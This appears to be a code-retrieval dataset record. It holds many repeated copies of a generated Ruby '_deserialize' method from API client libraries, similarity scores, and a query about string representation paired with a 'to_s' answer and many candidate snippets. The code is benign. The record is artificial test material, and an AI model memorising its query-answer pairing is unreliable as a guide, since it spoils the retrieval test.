"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = NSXT.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = NSXT.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = NSXT.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TreezorClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TreezorClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TreezorClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = SwiftApi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = SwiftApi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TripletexApi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = unwiredClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Quandoo.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end"
] |
[
"0.7330926",
"0.7274019",
"0.72504056",
"0.7245751",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.7218884",
"0.7213926",
"0.71909",
"0.7183136",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71712995",
"0.71712995",
"0.71712995",
"0.71712995",
"0.71712995",
"0.71632504",
"0.71549904",
"0.71473306",
"0.71413666",
"0.71413666",
"0.7141116",
"0.7141116",
"0.7141116",
"0.7133874",
"0.7133874",
"0.7133874",
"0.7133874",
"0.71333444",
"0.71333444",
"0.7127688",
"0.7125744",
"0.71210617",
"0.71210617",
"0.71190786",
"0.71184087",
"0.711393",
"0.7113519",
"0.7113519",
"0.7113516",
"0.71119875",
"0.71119875",
"0.71119875",
"0.7105169",
"0.7105169",
"0.7105169",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7102596",
"0.7102596",
"0.7102596",
"0.7101596",
"0.7101596",
"0.7101596",
"0.70996517",
"0.70996517",
"0.7097952",
"0.7097185",
"0.70965225"
] |
0.0
|
-1
|
Returns the string representation of the object
|
def to_s
to_hash.to_s
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def to_s\n @object.to_s\n end",
"def to_s\n object.to_s\n end",
"def serialize(object)\n object.to_s\n end",
"def to_s\n self.inspect\n end",
"def to_s\n @string || @object.to_s('F')\n end",
"def to_s\n @string || @object.to_s('F')\n end",
"def to_s\n \"#<#{self.class.name}:#{object_id} #{info}>\"\n end",
"def to_s\n \"#<#{self.class.name}:#{object_id}> @names=#{names}>\"\n end",
"def to_s\n self.inspect\n end",
"def to_s\n toString()\n end",
"def to_s\r\n dump\r\n end",
"def to_s\n inspect\n end",
"def to_s\n toString\n end",
"def toString\n #Not sure if we want this or just use the getters for more\n #selective formatting\n end",
"def to_s\n\t\t\t@string\n\t\tend",
"def to_s\n stringify\n end",
"def to_s\n to_h.to_s\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def inspect\n serialize.to_s\n end",
"def inspect\n to_s\n end",
"def to_s\n @string ||= Builder::ToString.new(self).string\n end",
"def to_s\n self\n end",
"def to_s()\n serialize.to_s()\n end",
"def to_s()\n serialize.to_s()\n end",
"def to_s\n string\n end",
"def to_s\n inspect\n end",
"def to_s\n inspect\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n self.to_s\n end",
"def inspect\n self.to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def to_s\n end",
"def to_s\n end",
"def to_s\n end",
"def to_s\n end",
"def inspect\n to_s.inspect\n end",
"def inspect()\n serialize.to_s()\n end",
"def inspect()\n serialize.to_s()\n end",
"def inspect\n return self.to_s\n end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end"
] |
[
"0.901024",
"0.89506465",
"0.84703195",
"0.83409667",
"0.8337169",
"0.8337169",
"0.8332247",
"0.82546586",
"0.8145818",
"0.8144667",
"0.81357557",
"0.812714",
"0.8093436",
"0.8086725",
"0.8073356",
"0.8039774",
"0.80308646",
"0.80064154",
"0.80064154",
"0.80064154",
"0.80064154",
"0.7962831",
"0.7962831",
"0.7962831",
"0.7962831",
"0.7954296",
"0.79446983",
"0.7919419",
"0.7909274",
"0.78848016",
"0.78848016",
"0.78841925",
"0.788328",
"0.788328",
"0.78758216",
"0.78758216",
"0.78758216",
"0.78758216",
"0.78758216",
"0.78758216",
"0.78758216",
"0.7866813",
"0.7866813",
"0.7865939",
"0.7865939",
"0.7850519",
"0.7850519",
"0.7850519",
"0.7850519",
"0.7808076",
"0.7784745",
"0.7784745",
"0.7767656",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824"
] |
0.0
|
-1
|
to_body is an alias to to_hash (backward compatibility)
|
def to_body
to_hash
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def to_body\r\n to_hash\r\n end",
"def to_body\n to_hash\nend",
"def to_body\n to_hash\nend"
] |
[
"0.84283537",
"0.8347048",
"0.8347048"
] |
0.0
|
-1
|
Returns the object in the form of hash
|
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def to_hash\n object\n end",
"def hash\r\n return to_s.hash\r\n end",
"def hash\n to_a.hash\n end",
"def hash\n [_hash, name, owner].hash\n end",
"def hash\n return to_s.hash\n end",
"def hash\n @hash\n end",
"def hash\n @hash.hash\n end",
"def hash\n @hash ||= self.to_a.hash\n end",
"def to_hash\n @hash\n end",
"def to_hash\n @hash\n end",
"def hash\n to_s.hash\n end",
"def to_hash\n @hash\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @hash\n end",
"def to_h\n @hash\n end",
"def hash\n to_h.hash ^ self.class.hash\n end",
"def as_hash\n @hash\n end",
"def __getobj__\n @hashobj\n end",
"def to_hash() end",
"def hash\n to_s.hash\n end",
"def hash\n to_s.hash\n end",
"def hash\n object_id\n end",
"def to_hash\n @_hash_\n end",
"def hash\n\t\treturn self.name.to_s.hash\n\tend",
"def to_hash\n to_a.hash\n end",
"def hash\n { hash: @hash, hashType: @hash_type }\n end",
"def hash\n data.hash\n end",
"def hash\n [self.class, to_h].hash\n end",
"def hash\n [self.class, to_h].hash\n end",
"def hash\n [self.class, to_h].hash\n end",
"def hash\r\n id.hash\r\n end",
"def hash\n \"#{self.class.name}-#{self.id}-#{@__metadata__.cas}-#{@__attributes__.hash}\".hash\n end",
"def hash\n attributes.hash\n end",
"def hash\n attributes.hash\n end",
"def hash\n attributes.hash\n end",
"def hash #:nodoc:\n __getobj__.hash ^ self.class.hash\n end",
"def hash\n self.to_f.hash\n end",
"def hash\n end",
"def hash\n end",
"def hash\n end",
"def to_hash\n return self\n end",
"def to_hash(object)\n validate_class_kit(object.class)\n\n @hash_helper.to_hash(object)\n end",
"def hash\n return @id.hash\n end",
"def to_h\n Hash[ self ]\n end",
"def to_hash\n Hash[self]\n end",
"def to_h\n @hash.dup\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def to_h\n @hash.dup\n end",
"def hash\n model.hash + key.hash\n end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def hash\n [self.class, to_s].hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n self.atoms.hash\n end",
"def to_h\n Hash[self]\n end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash\n\t\tvalue.hash\n\tend",
"def hash\n [description, routing_number, account_number, account_type, signatory, metadata, id, signature_url, bank_name, verified, date_created, date_modified, deleted, object].hash\n end",
"def hash\n @id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n self.class.name.hash\n end",
"def to_h\n @_hash.dup\n end",
"def hash\n\t\t[@id].hash\n\tend",
"def hash\n [self.class, to_s].hash\n end",
"def __hash\n @hash\n end"
] |
[
"0.8270299",
"0.78767854",
"0.78726953",
"0.7802364",
"0.7789188",
"0.77806795",
"0.7775915",
"0.7767511",
"0.7760525",
"0.7760525",
"0.77559966",
"0.7731286",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7647042",
"0.7647042",
"0.7626769",
"0.760354",
"0.7595938",
"0.7582562",
"0.7579971",
"0.7579971",
"0.7535553",
"0.7495252",
"0.7433835",
"0.7411177",
"0.73843014",
"0.73661345",
"0.73658615",
"0.73658615",
"0.73658615",
"0.73600674",
"0.7359121",
"0.73590857",
"0.73590857",
"0.73590857",
"0.7340058",
"0.73356754",
"0.7329828",
"0.7329828",
"0.7329828",
"0.73170114",
"0.730566",
"0.73028016",
"0.7294603",
"0.72854036",
"0.72643596",
"0.72637254",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.726188",
"0.72524244",
"0.72511965",
"0.72511965",
"0.72511965",
"0.72511965",
"0.72511965",
"0.72511965",
"0.72479564",
"0.72474235",
"0.72474235",
"0.7241066",
"0.7229342",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7224175",
"0.72185695",
"0.72126305",
"0.72116995",
"0.71945405",
"0.71828544",
"0.7181684",
"0.7171822",
"0.71657544"
] |
0.0
|
-1
|
Outputs nonarray value in the form of hash For object, use to_hash. Otherwise, just return the value
|
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def hash\n [value].hash\n end",
"def hash\n [value].hash\n end",
"def hash\n\t\tvalue.hash\n\tend",
"def hash\n value.hash\n end",
"def hash\n @value.hash\n end",
"def hash\r\n return to_s.hash\r\n end",
"def to_hash\n @value\n end",
"def to_hash\n @value\n end",
"def hash\n @hash || @hash = (value.hash * -1)\n end",
"def output_hash; end",
"def to_hash() end",
"def hash\n return to_s.hash\n end",
"def hash\n value_id.hash\n end",
"def to_hash\n call\n @hash = @value\n @hash\n end",
"def hash\n to_s.hash\n end",
"def hash\n to_s.hash\n end",
"def hash\n self.to_f.hash\n end",
"def hash\n to_s.hash\n end",
"def to_hash(obj = T.unsafe(nil)); end",
"def to_h\n @value\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map { |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map { |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map { |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map { |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def value_to_hash(value, options = T.unsafe(nil)); end",
"def to_s\r\n to_hash.to_s\r\n end",
"def _to_hash(value)\r\n if value.is_a?(Array)\r\n value.compact.map{ |v| _to_hash(v) }\r\n elsif value.is_a?(Hash)\r\n {}.tap do |hash|\r\n value.each { |k, v| hash[k] = _to_hash(v) }\r\n end\r\n elsif value.respond_to? :to_hash\r\n value.to_hash\r\n else\r\n value\r\n end\r\n end",
"def hash; end",
"def hash; end",
"def hash; end",
